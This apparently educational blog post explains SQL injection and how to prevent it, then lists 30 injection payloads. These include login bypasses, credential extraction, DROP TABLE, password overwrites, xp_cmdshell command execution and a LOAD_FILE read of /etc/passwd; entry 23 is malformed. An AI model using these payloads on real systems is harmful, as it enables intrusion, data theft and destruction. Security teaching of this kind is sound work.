SQL Injection (SQLi) is a type of cybersecurity vulnerability that allows attackers to manipulate the Structured Query Language (SQL) queries made by an application to interact with its database. By exploiting these vulnerabilities, attackers can bypass authentication, retrieve sensitive data, modify or delete database entries, and even take control of the database server.
SQL Injection typically occurs when user input is directly embedded in SQL queries without proper validation or sanitization. This flaw is most common in web applications that interact with a backend database for functions such as login authentication, user registration, or data retrieval.
Types of SQL Injection
- Classic SQL Injection: Exploits user input fields to manipulate SQL queries.
- Blind SQL Injection: Does not display data but gives clues about the database through true/false responses or timing.
- Error-Based SQL Injection: Leverages error messages to gain information about the database structure.
- Union-Based SQL Injection: Combines multiple SELECT queries to extract data from other tables.
- Time-Based SQL Injection: Delays the server's response to infer query execution results.
Impacts of SQL Injection
- Data Breaches: Attackers can steal sensitive information, such as usernames, passwords, and credit card details.
- Loss of Trust: A hacked application can harm the organization’s reputation.
- Financial Losses: SQL Injection can result in financial penalties or revenue losses due to service disruptions.
- Full Database Compromise: Attackers may gain full administrative control over the database.
Preventing SQL Injection
- Input Validation: Validate and sanitize user inputs before processing.
- Parameterized Queries: Use prepared statements or parameterized queries to prevent query manipulation.
- Stored Procedures: Execute database queries using predefined stored procedures.
- Error Handling: Suppress detailed error messages from end-users.
- Database Privileges: Restrict database user privileges to limit potential damage.
30 SQL Injection Scripts and Their Uses
Below are 30 examples of SQL Injection payloads and their purposes. These are provided strictly for educational and awareness purposes. Always use such scripts in a controlled and ethical environment, such as penetration testing labs.
| # | SQL Injection Script | Use Case |
|---|---|---|
| 1 | ' OR '1'='1' -- | Bypass authentication by always evaluating to true. |
| 2 | ' OR 1=1; -- | Bypass login forms. |
| 3 | admin' -- | Log in as "admin" if no password validation is performed. |
| 4 | '; DROP TABLE users; -- | Deletes the users table (destructive action). |
| 5 | ' UNION SELECT NULL, username, password FROM users -- | Retrieves usernames and passwords using union queries. |
| 6 | 1 AND SLEEP(5) -- | Time-based SQLi to determine if the injection is successful. |
| 7 | 1' ORDER BY 3 -- | Determines the number of columns in a query. |
| 8 | ' UNION SELECT @@version, NULL -- | Reveals the database version. |
| 9 | ' AND 1=CAST((SELECT @@version) AS INT) -- | Exploits type casting to check database version. |
| 10 | ' OR EXISTS(SELECT * FROM users WHERE username='admin') -- | Checks if an "admin" user exists in the database. |
| 11 | ' UNION SELECT NULL, TABLE_NAME FROM INFORMATION_SCHEMA.TABLES -- | Lists all table names in the database. |
| 12 | ' UNION SELECT NULL, COLUMN_NAME FROM INFORMATION_SCHEMA.COLUMNS WHERE TABLE_NAME='users' -- | Lists all columns in the users table. |
| 13 | 1' OR (SELECT COUNT(*) FROM users) > 0 -- | Checks if the users table has entries. |
| 14 | ' AND 1=0 UNION ALL SELECT NULL, database(), user() -- | Reveals the current database and user. |
| 15 | '; EXEC xp_cmdshell('whoami') -- | Executes OS-level commands (on MSSQL). |
| 16 | 1' UNION SELECT 1, group_concat(schema_name) FROM information_schema.schemata -- | Lists all database schemas. |
| 17 | ' UNION ALL SELECT NULL, LOAD_FILE('/etc/passwd') -- | Attempts to read the contents of sensitive files (MySQL-specific). |
| 18 | ' UNION SELECT 1, benchmark(5000000,md5('a')) -- | Creates a time delay to test SQLi. |
| 19 | '; WAITFOR DELAY '00:00:10' -- | Introduces a delay to infer information (MSSQL). |
| 20 | '; SELECT * FROM users WHERE username LIKE '%admin%' -- | Retrieves usernames containing "admin". |
| 21 | ' AND ASCII(SUBSTRING((SELECT database()),1,1)) > 77 -- | Extracts database name character by character. |
| 22 | ' AND (SELECT COUNT(*) FROM users) > 10 -- | Checks if more than 10 users exist in the users table. |
| 23 | ' UNION SELECT NULL, version(), current | Reveals database version and current user. |
| 24 | ' UNION SELECT NULL, NULL, table_name FROM information_schema.tables WHERE table_schema=database() -- | Lists all tables in the current database. |
| 25 | ' UNION SELECT NULL, CONCAT(username, ':', password) FROM users -- | Combines and retrieves username-password pairs. |
| 26 | '; UPDATE users SET password='hacked' WHERE username='admin' -- | Changes the admin password (destructive). |
| 27 | '; INSERT INTO users (username, password) VALUES ('hacker', '12345') -- | Adds a new user account to the database. |
| 28 | ' AND 1=(SELECT CASE WHEN (1=1) THEN 1 ELSE pg_sleep(5) END) -- | Tests SQLi on PostgreSQL using time delay. |
| 29 | ' UNION SELECT NULL, NULL, NULL, TABLE_NAME FROM ALL_TABLES -- | Retrieves all table names in Oracle databases. |
| 30 | 1' OR UPDATEXML(NULL, CONCAT(0x3a, version()), NULL) -- | Exploits XML functions to extract database version. |
Conclusion
SQL Injection is a critical vulnerability that can lead to severe consequences if exploited. Understanding how attackers craft SQLi payloads is essential for developers, security analysts, and ethical hackers. Implementing secure coding practices, proper input validation, and database security measures can effectively mitigate these risks.
Note: This content is meant for educational purposes only. Always practice ethical hacking and comply with the law and organizational policies.
Comments
Post a Comment